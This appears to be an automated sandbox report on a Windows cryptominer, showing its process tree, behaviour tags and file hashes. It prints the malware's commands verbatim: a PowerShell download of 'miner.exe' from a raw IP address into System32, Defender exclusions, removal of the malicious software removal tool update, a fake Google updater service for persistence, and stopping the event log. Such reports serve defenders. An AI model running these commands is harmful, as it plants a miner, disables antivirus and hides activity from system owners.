C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3160
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵
- Suspicious use of WriteProcessMemory
PID:4676 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension 'exe' -ExclusionPath 'C:\Windows\System32\'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2420
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue' ; Invoke-WebRequest "http://45.67.229.122/miner.exe" -OutFile 'C:\Windows\System32\msdr.exe'2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3508
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:4168
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks processor information in registry
- Enumerates system info in registry
PID:5080
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:2680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:812
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵PID:4588
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵
- Suspicious use of WriteProcessMemory
PID:4236 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & 'C:\Windows\System32\msdr.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:948 -
C:\Windows\SysWOW64\msdr.exe"C:\Windows\System32\msdr.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4728 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3628
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:3944
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:4476
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:3440
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:3840
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:4912
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2188
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"4⤵
- Launches sc.exe
PID:4516
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"4⤵
- Launches sc.exe
PID:4612
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:3680
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"4⤵
- Launches sc.exe
PID:680 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3028
-
-
-
-
-
C:\ProgramData\Google\Chrome\updater.exeC:\ProgramData\Google\Chrome\updater.exe1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:3604 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2624 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1536
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:3220
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4424
-
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:5052
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵PID:5084
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3404
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵PID:1572
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3792
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵PID:4704
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1396
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵PID:3052
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4120
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:1728
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:4024
-
-
C:\Windows\system32\dialer.exedialer.exe2⤵PID:3036
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
12KB
MD5de192748c1819cdfda8742dba77adf61
SHA1cbceba119e644dd5a0b0e3cd52795dfbd724c33d
SHA2562abe650647d07e0e17fb001d3c74045768606b1080bfd9dcc68ab56f3e5dff37
SHA5127ca21bb2f583a436eaac8753b2b4cd4f901c1f922334e354a94d8c88107bed78c58bf44297692ea4be86b76e4d32d3fb8af0659fe4e57f83f2dabd92961b4912
-
Filesize
16KB
MD5c4ec15313cc2c262f06cf8d83c4449e8
SHA107935dc8115150835cc07be3bb0b07f33381b8a7
SHA256e696dd82b360ac1a83a4df6d3e1e1cb4cbc19bb2606efb1f576d657f45fd9d5b
SHA5126cd902d2f35f0d98636789d852cbb09a4b3e01d19546983620e185d176ff759aef786082d366ac9f242aa3bda438b544be8842646dbd18f45e6998182548ae37
-
Filesize
11KB
MD5afcc5e511b683f75b43a555de526a783
SHA1ad98335138df7ad7e6f3a8a4d25539d8405a6437
SHA256d606e477327318543c554792ca45728efa0169b42c633ce7eca9c34f7bf7381a
SHA512e9fd165de39dc75d6224dd8c18cdee3c555204b04b1ec0652d8806a8b517a037a49cd74e899325907704f886084e771b8700492ae7d0eebde85378ae8ad4ecbc
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
5.3MB
MD53974c5d0b92366bbc9af950c8d7f898d
SHA11b141b9cced64d1b86cd9d3460062ee7ecd34357
SHA256c88dbfa8510ba03e204e2458434be95cb232f34a0b530a299ba6fdecd3c39820
SHA5126b786fcf6ad40c3f8007e55242db7794f640177f3394a49a3ac9dc3b6cf3588eefe8e3db8ed21d9fcc3962de50d48c6c28867ab92a7da324389e19b9642170fa
-
Filesize
3KB
MD500930b40cba79465b7a38ed0449d1449
SHA14b25a89ee28b20ba162f23772ddaf017669092a5
SHA256eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62